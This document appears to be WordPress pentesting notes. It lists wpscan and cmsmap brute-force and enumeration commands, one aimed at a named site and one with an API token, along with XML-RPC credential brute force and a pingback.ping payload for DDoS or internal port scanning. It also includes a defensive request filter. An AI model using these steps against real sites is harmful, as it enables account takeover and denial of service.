In wp-config.php you can find the root password of the database.
Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Enumeration
cmsmap -s http://www.48pallmall.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap --url http://www.domain.com --api-token qNzF78w2S7s8QarQ2ISZbNR2Gq4FOmJV05HGjwvRMlM --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up to 50 searches)
#You can try to brute-force the admin user using wpscan with "-U admin"
Information Disclosure
Inside the WordPress folder try to access:
/wp-json/wp/v2/users -- This could leak usernames
/wp-json/wp/v2/pages -- This could leak an IP address
XML-RPC
If xmlrpc.php is active you can perform a credentials brute-force or use it to launch DoS attacks against other resources.
To see if it is active, try to access /xmlrpc.php and send this request:
Check
Credentials Bruteforce
wp.getUserBlogs, wp.getCategories or metaWeblog.getUsersBlogs are some of the methods that can be used to brute-force credentials. If you can find any of them you can send something like:
The message "Incorrect username or password" inside a 200 code response should appear if the credentials aren't valid.
Also there is a faster way to brute-force credentials using system.multicall as you can try several credentials on the same request:
DDoS or port scanning
If you can find the method pingback.ping inside the list you can make the WordPress site send an arbitrary request to any host/port.
This can be used to ask thousands of WordPress sites to access one location (so a DDoS is caused in that location), or to make the WordPress site scan some internal network (you can indicate any port).
If you get a faultCode with **a value greater than 0** (17), it means the port is open.
Take a look at the use of system.multicall in the previous section to learn how this method can be abused to cause a DDoS.
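The credential brute-force and pingback.ping abuse described above both arrive as XML-RPC request bodies, so a reverse proxy or WAF in front of /xmlrpc.php can classify them before WordPress sees them. The following is an added example (not code from the original page or from WordPress) of such a gate: it flags pingback.ping, the credential-accepting methods named above, and system.multicall batches that exceed an assumed threshold or wrap those methods; build_multicall only constructs sample bodies for testing.

```python
import xml.etree.ElementTree as ET

# Methods the page names for credential brute force, plus the pingback method.
CREDENTIAL_METHODS = {"wp.getUsersBlogs", "wp.getUserBlogs", "wp.getCategories", "metaWeblog.getUsersBlogs"}
PINGBACK = "pingback.ping"
MULTICALL = "system.multicall"
MAX_MULTICALL = 3  # assumed local policy threshold, not a WordPress default

def build_multicall(method_names):
    """Constructed sample: wrap the given method names in one system.multicall body."""
    calls = "".join(
        "<value><struct><member><name>methodName</name>"
        f"<value><string>{m}</string></value></member>"
        "<member><name>params</name><value><array><data/></array></value></member>"
        "</struct></value>" for m in method_names)
    return (f"<methodCall><methodName>{MULTICALL}</methodName><params><param>"
            f"<value><array><data>{calls}</data></array></value></param></params></methodCall>")

def _inner_methods(root):
    """Collect the methodName of every call inside a system.multicall request."""
    names = []
    for member in root.iter("member"):
        if member.findtext("name") == "methodName":
            value = member.find("value")
            names.append("".join(value.itertext()).strip() if value is not None else "")
    return names

def classify_xmlrpc(body):
    """Return {'method', 'block', 'reasons'} for one XML-RPC request body."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"method": None, "block": True, "reasons": ["malformed XML"]}
    method = (root.findtext("methodName") or "").strip()
    reasons = []
    if method == PINGBACK:
        reasons.append("pingback.ping makes the site request an attacker-chosen host:port")
    elif method in CREDENTIAL_METHODS:
        reasons.append(f"{method} accepts credentials and is a brute-force target")
    elif method == MULTICALL:
        inner = _inner_methods(root)
        if len(inner) > MAX_MULTICALL:
            reasons.append(f"system.multicall batches {len(inner)} calls (limit {MAX_MULTICALL})")
        if CREDENTIAL_METHODS & set(inner):
            reasons.append("system.multicall wraps credential methods (batched guessing)")
        if PINGBACK in inner:
            reasons.append("system.multicall wraps pingback.ping (amplified pingback abuse)")
    return {"method": method, "block": bool(reasons), "reasons": reasons}
```

Inside WordPress itself the same methods can be removed server-side with the xmlrpc_methods filter, which is the simpler fix when XML-RPC is not needed at all.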
wp-cron.php DoS
This file usually exists under the root of the WordPress site: /wp-cron.php
When this file is accessed a "heavy" MySQL query is performed, so it could be used by attackers to cause a DoS.
Also, by default, wp-cron.php is called on every page load (any time a client requests any WordPress page), which on high-traffic sites can cause problems (DoS).
It is recommended to disable WP-Cron and create a real cron job on the host that performs the needed actions at a regular interval (without causing issues).
Example pingback.ping request (for the "DDoS or port scanning" section):
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER>:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE></string>
</value></param></params>
</methodCall>